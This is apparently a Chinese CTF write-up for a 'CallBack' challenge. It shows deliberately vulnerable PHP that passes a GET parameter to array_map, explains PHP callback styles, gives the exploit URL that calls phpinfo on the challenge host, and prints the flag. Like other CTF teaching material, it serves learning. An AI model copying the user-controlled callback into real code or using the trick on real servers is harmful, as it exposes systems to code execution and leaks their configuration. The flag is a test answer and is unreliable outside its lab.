【青少年CTF S1·2026 公益赛】CallBack

php 复制代码
<?php
function executeCallback($callback)
{
    $someArray = [0, 1, 2, 3];
    return array_map($callback, $someArray);
}

if (isset($_GET['callback'])) {
    $evilCallback = $_GET['callback'];
    $newArray = executeCallback($evilCallback);
}
?>

什么是回调函数?

回调函数就是函数被当作参数传递给另一个函数,并在合适的实践被"调用"

PHP中4种常见的回调函数写法

1、普通回调函数(字符串传递函数名)

php 复制代码
function sayHi($name) {
    echo "Hi, $name";
}
// 调用:直接传函数名字符串
call_user_func('sayHi', 'Tom');

2、匿名函数回调(最常用)

不同提取定义函数,直接写在参数里面

php 复制代码
$numbers = [1,2,3];
$newArr = array_map(function($n) {
    return $n + 1;
}, $numbers);

3、类方法回调

php 复制代码
class Test {
    public static function hello() {
        echo "Hello";
    }
}
// 静态方法回调
call_user_func(['Test', 'hello']);

4、对象方法回调

php 复制代码
class Test {
    public function hi() {
        echo "Hi";
    }
}
$obj = new Test();
call_user_func([$obj, 'hi']);

题目用 array_map($callback, 0,1,2,3),这意味着用户传入的函数会被执行,但参数被强制固定为数字 0-3。

当我们传递system()的时候,PHP会执行system(0)、system(1)、system(2)、system(3)

因此不能传递system()函数

这题直接使用phpinfo,phpinfo可以接收整数参数

php 复制代码
http://challenge.qsnctf.com:55842/?callback=phpinfo

直接在配置信息中找到flag

php 复制代码
qsnctf{c893c0079b974676b4dbffad9c43b7d8}
相关推荐
pencek15 小时前
HakcMyVM-Canto
网络安全
24kmaigc16 小时前
NewStarCTF2025-ssti在哪里?-ssrf与ssti注入
python·网络安全·flask·web
AIDABI16 小时前
Vulnhub-DC-9
web安全·网络安全
搞科研的小刘选手18 小时前
【南昌大学主办】第五届人工智能、物联网和云计算技术国际会议(AIoTC 2026)
人工智能·物联网·网络安全·大模型·云计算·智慧城市·云安全
WangX-西石油18 小时前
DVWA靶场上Low级别SQL注入漏洞学习
sql·网络安全
Chengbei1119 小时前
AI赋能Chrome MCP × JS逆向Skill自动化JS逆向助力挖洞与绕过实战(小白也能学会)
javascript·人工智能·chrome·网络安全·自动化·系统安全·安全架构
XLYcmy20 小时前
Agent身份与权限系统设计方案
windows·网络安全·ai·llm·飞书·api·agent
宋浮檀s1 天前
应急响应——恶意流量&攻击行为识别
linux·运维·网络·网络安全·应急响应
谪星·阿凯1 天前
内网渗透之权限维持:从域环境到单机的持久化控制指南
运维·服务器·网络·网络安全
宋浮檀s2 天前
春秋云镜——CVE-2022-22965
网络·安全·web安全·网络安全